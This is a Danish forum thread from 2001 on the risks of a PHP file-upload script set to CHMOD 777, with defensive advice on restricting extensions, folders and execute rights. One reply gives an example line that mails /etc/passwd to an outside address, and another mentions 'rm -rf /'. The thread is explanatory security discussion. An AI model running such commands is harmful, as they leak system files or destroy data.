|
| UPLOADER ? CHMOD 777 Fra : rh |
Dato : 23-10-01 08:38 |
|
kan det misbruges (andet end at folk kan vold oploade)
?!?!
| |
Thomas Jensen - pil.~ (23-10-2001)
| Kommentar Fra : Thomas Jensen - pil.~ |
Dato : 23-10-01 08:39 |
|
On Tue, 23 Oct 2001 09:38:22 +0200, "rh" <div@hollensted.dk> wrote:
>kan det misbruges (andet end at folk kan vold oploade)
hvad må folk uploade?
>?!?!
sikke en sjov tegnsætning.
--
vh
Thomas Jensen
http://pil.dk/
| |
Kim Emax - ayianapa.~ (23-10-2001)
| Kommentar Fra : Kim Emax - ayianapa.~ |
Dato : 23-10-01 09:41 |
|
"rh" <div@hollensted.dk> skrev i en meddelelse
news:3bd51e24$0$202$edfadb0f@dspool01.news.tele.dk...
> kan det misbruges (andet end at folk kan vold oploade)
hvis man uploader en fil: hehe.php, som indeholder f.eks. en opendir, der
læser alle filer, renamer eller kopierer alle dine .php, .phtml, .php4,
..php3 filer til .phps, og printer det på skærmen, så er al din kode
åbenbar... endnu grimmere bliver det, hvis man renamer alle .inc filer...
Som Thomas spørger: "hvad må folk uploade?" bestem dig for, hvilke filext.
der er tilladte/ønskede og tjek den uploadede fils ext. mod dette...
og ja, afhængig af din serveropsætning kan det også være fatalt, hvis et
simpelt men fælt perl script*, der uploades og kaldes, derfor skal du ikke
bruge CHMOD 777, ingen uploadede filer har behov for execute rettigheder!
* cat /etc/passwd | mail -s hehe hehe@hehe.dk
--
Take Care
Kim Emax
http://www.emax.dk
http://www.ayianapa.dk
http://www.artificial-dreams.dk
Køb din vin online på http://www.gmvin.dk,
Danmarks mest avancerede VinWebShop
| |
Mickey (23-10-2001)
| Kommentar Fra : Mickey |
Dato : 23-10-01 15:06 |
|
"Kim Emax - ayianapa.dk" <newsgroup@sletdette-ayianapa.dk> skrev i en
meddelelse news:P0aB7.234$D%
> * cat /etc/passwd | mail -s hehe hehe@hehe.dk
en liste over brugere... - hva vil du bruge det til ?
- jeg må ærligt indrømme at jeg ikke ved hvad det er der er så farlig ved
det...
--
|-|$235-|)k - Mickey - Eko sum lapis
Advarsel :
Dette indlæg er koncentreret kommunikation.
Tilsæt diplomatiske vendinger i passende mængde.
| |
Niels Andersen (23-10-2001)
| Kommentar Fra : Niels Andersen |
Dato : 23-10-01 15:18 |
|
"Mickey" <news002@susie.dk> wrote in message
news:9r3the$ra8$1@egon.worldonline.dk...
> > * cat /etc/passwd | mail -s hehe hehe@hehe.dk
> en liste over brugere... - hva vil du bruge det til ?
Nah, den er ikke meget værd, hvis der bruges shadow passwords.
Men det er jo altså nu engang noget skidt, at folk har adgang til
systemet på den måde.
Du tager jo heller ikke skade af, at jeg kommer og åbner alle dine
skabslåger og skuffer i dit hus, mens du er på ferie. Men det er da ret
ubehageligt, ik'?
Og hvis jeg kan det, så kan jeg jo også tømme skabe og skuffer...
--
Mvh.
Niels Andersen
| |
Mickey (23-10-2001)
| Kommentar Fra : Mickey |
Dato : 23-10-01 23:02 |
|
"Niels Andersen" <niels-usenet@myplace.dk> skrev i en meddelelse
news:H_eB7.496
> Nah, den er ikke meget værd, hvis der bruges shadow passwords.
> Men det er jo altså nu engang noget skidt, at folk har adgang til
> systemet på den måde.
ka udemærket se symbolværdien ;)
> Du tager jo heller ikke skade af, at jeg kommer og åbner alle dine
> skabslåger og skuffer i dit hus, mens du er på ferie. Men det er da ret
> ubehageligt, ik'?
> Og hvis jeg kan det, så kan jeg jo også tømme skabe og skuffer...
ubehageligt - specielt lige nu hvor der er masser af indbrud i nærheden :(
--
|-|$235-|)k - Mickey - Eko sum lapis
Advarsel :
Dette indlæg er koncentreret kommunikation.
Tilsæt diplomatiske vendinger i passende mængde.
| |
Kim Emax - ayianapa.~ (23-10-2001)
| Kommentar Fra : Kim Emax - ayianapa.~ |
Dato : 23-10-01 22:40 |
|
"Mickey" <news002@susie.dk> skrev i en meddelelse
news:9r3the$ra8$1@egon.worldonline.dk...
> "Kim Emax - ayianapa.dk" <newsgroup@sletdette-ayianapa.dk> skrev i en
> meddelelse news:P0aB7.234$D%
>
> > * cat /etc/passwd | mail -s hehe hehe@hehe.dk
>
> en liste over brugere... - hva vil du bruge det til ?
> - jeg må ærligt indrømme at jeg ikke ved hvad det er der er så farlig ved
> det...
Du finder det ikke problematisk rent sikkerhedsmæssigt at jeg kender dine
brugere? så skal jeg bare finde passwordet, det tager nok ikke så lang tid
at lave en rutine, der prøver sig frem...men jeg kan da også bare uploade
filen med "rm -rf /" - hvis det skræmmer mere?
--
Take Care
Kim Emax
http://www.emax.dk
http://www.ayianapa.dk
http://www.artificial-dreams.dk
Køb din vin online på http://www.gmvin.dk,
Danmarks mest avancerede VinWebShop
| |
Mickey (23-10-2001)
| Kommentar Fra : Mickey |
Dato : 23-10-01 23:01 |
|
"Kim Emax - ayianapa.dk" <newsgroup@sletdette-ayianapa.dk> skrev i en
meddelelse news:TqlB7.634
> Du finder det ikke problematisk rent sikkerhedsmæssigt at jeg kender dine
> brugere? så skal jeg bare finde passwordet, det tager nok ikke så lang tid
> at lave en rutine, der prøver sig frem...men jeg kan da også bare uploade
> filen med "rm -rf /" - hvis det skræmmer mere?
jo jo, men rm -rf / er næsten bedre eftersom passwordene alligevel er
krypterede ;)
- men jo, jeg kan godt se det som symbolværdi, og det er jo noget folk
kender...
--
|-|$235-|)k - Mickey - Eko sum lapis
Advarsel :
Dette indlæg er koncentreret kommunikation.
Tilsæt diplomatiske vendinger i passende mængde.
| |
Thomas Jensen - pil.~ (23-10-2001)
| Kommentar Fra : Thomas Jensen - pil.~ |
Dato : 23-10-01 23:05 |
|
On Wed, 24 Oct 2001 00:01:02 +0200, "Mickey" <news002@susie.dk> wrote:
>"Kim Emax - ayianapa.dk" <newsgroup@sletdette-ayianapa.dk> skrev i en
>meddelelse news:TqlB7.634
>
>> Du finder det ikke problematisk rent sikkerhedsmæssigt at jeg kender dine
>> brugere? så skal jeg bare finde passwordet, det tager nok ikke så lang tid
>> at lave en rutine, der prøver sig frem...men jeg kan da også bare uploade
>> filen med "rm -rf /" - hvis det skræmmer mere?
>
>jo jo, men rm -rf / er næsten bedre eftersom passwordene alligevel er
>krypterede ;)
> - men jo, jeg kan godt se det som symbolværdi, og det er jo noget folk
>kender...
kun en symbolværdi?
har du et website m. noget uploadvæsen hvor du ikke tjekker for input?
.... så skal jeg gerne efter aftale bukke symbolværdien i både neon og
stål, således effekten kunne tænkes at blive opgraderet fra
"symbolværdi" til "hovsa, det var vist ikke så godt".
--
med venlig hilsen
Thomas Jensen
http://pil.dk/
| |
Mickey (23-10-2001)
| Kommentar Fra : Mickey |
Dato : 23-10-01 23:19 |
|
"Thomas Jensen - pil.dk" <tj@dev.null> skrev i en meddelelse
news:68qbtt4upkatcjorn2uakdu46fkdvvnhce@4ax.com...
> ... så skal jeg gerne efter aftale bukke symbolværdien i både neon og
> stål, således effekten kunne tænkes at blive opgraderet fra
> "symbolværdi" til "hovsa, det var vist ikke så godt".
nej nej nej nej, mente at det var symbol at man altid henviste til
/etc/passwd og ikke alle mulige andre filer der også kunne blive ubehagelige
;)
--
|-|$235-|)k - Mickey - Eko sum lapis
Advarsel :
Dette indlæg er koncentreret kommunikation.
Tilsæt diplomatiske vendinger i passende mængde.
| |
Kristian Risager Lar~ (24-10-2001)
| Kommentar Fra : Kristian Risager Lar~ |
Dato : 24-10-01 13:05 |
|
> filen med "rm -rf /" - hvis det skræmmer mere?
Så vidt jeg ved kan det kun lade sig gøre som root, og hvem i alverden kunne
finde på at køre en (web)server som root?
--
/Kristian Risager Larsen
http://kezze.dk
"Jeg vil have en kat af svesker"
| |
Niels Andersen (23-10-2001)
| Kommentar Fra : Niels Andersen |
Dato : 23-10-01 09:49 |
|
"rh" <div@hollensted.dk> wrote in message
news:3bd51e24$0$202$edfadb0f@dspool01.news.tele.dk...
> kan det misbruges (andet end at folk kan vold oploade)
Altså ud over at lave en warez-/pornocentral? Ja da!
Måske giver dit system mulighed for at placere filerne hvor som helst.
"/etc/passwd", for eksempel.
Måske bliver filerne placeret uberørt inden for webscope. Så kan man fx.
uploade en PHP-fil, som derefter kan udføres på serveren. Og så kan man
lave lige så meget ravage, som du selv kan.
Der er masser af potentielle sikkerhedshuller. Men her er nogle
retninglinjer, som skulle klare de fleste af dem:
Sørg for at brugeren er begrænset til et bestemt område filen kan puttes
i. Gerne en enkelt mappe.
Lad ikke brugeren navngive filen selv. Her tænker jeg specielt på
"filtypen".
Sørg for, at PHP ikke parser de uploadede filer, når de vises! Hvis der
fx. uploades en gif-fil gør det normalt ikke noget, at den bliver
parset. Men så kan man putte php-kode i kommentar-delen af filen! Det er
stadig en fuldt ud gyldig gif-fil, men den er ca. lige så farlig, som at
give folk mulighed for at uploade php-filer.
Stol ikke på at filtypen eller content-typen er korrekt.
> ?!?!
!!!! :)
--
Mvh.
Niels Andersen
| |
Dennis Vinther (25-10-2001)
| Kommentar Fra : Dennis Vinther |
Dato : 25-10-01 01:55 |
|
Er der nogen som kan forklare hvorfor min Norton Antivirus 2002 siger at der
er virus i denne post?
Helt præsist skriver den at det er virus af typen Unix.Penguin alias
~UNIX/Jaded, SH/Penguin.A, Linux/Penguin
http://www.sarc.com/avcenter/cgi-bin/virauto.cgi?vid=28939
Den skriver stien til den temp-folder windows bruger :
....\Temporary Internet Files\Content.IE5\V2KQJCF1\Re_ UPLOADER _ CHMOD 777
(1).txt
Mvh
Dennis
| |
Niels Andersen (24-10-2001)
| Kommentar Fra : Niels Andersen |
Dato : 24-10-01 17:04 |
|
"Dennis Vinther" <drvi00@kom.auc.dk> wrote in message
news:9r6odk$c5$1@sunsite.dk...
> Er der nogen som kan forklare hvorfor min Norton Antivirus 2002 siger
at der
> er virus i denne post?
Med "denne post", så mener den post du rent faktisk svarer på, vel?
> Helt præsist skriver den at det er virus af typen Unix.Penguin alias
> ~UNIX/Jaded, SH/Penguin.A, Linux/Penguin
> http://www.sarc.com/avcenter/cgi-bin/virauto.cgi?vid=28939
Kim skrevet et svar, hvor i der står unix-kommandoen til at sende en
mail med password-filen i.
Det er præcis det, NAV finder, og mener er skaldeligt.
Trist at den ikke kan se forskel på uskadelig tekst, og et shell-script.
:)
--
Mvh.
Niels Andersen
| |
Dennis Vinther (25-10-2001)
| Kommentar Fra : Dennis Vinther |
Dato : 25-10-01 02:47 |
|
> Med "denne post", så mener den post du rent faktisk svarer på, vel?
Tja.. det troede jeg, men ved et ekstra check viste det sig at begynde efter
Kims indlæg
> Kim skrevet et svar, hvor i der står unix-kommandoen til at sende en
> mail med password-filen i.
> Det er præcis det, NAV finder, og mener er skaldeligt.
Dohh!! Det burde jeg sku ha set!
> Trist at den ikke kan se forskel på uskadelig tekst, og et shell-script.
> :)
Meget!
Mvh
Dennis
| |
Kim Emax - ayianapa.~ (24-10-2001)
| Kommentar Fra : Kim Emax - ayianapa.~ |
Dato : 24-10-01 19:09 |
| | |
Dennis Vinther (26-10-2001)
| Kommentar Fra : Dennis Vinther |
Dato : 26-10-01 05:36 |
|
> stiller du dit ur, nu du er i gang?
Sorry... (Sprit ny windoze installation)
Mvh
Dennis
| |
|
|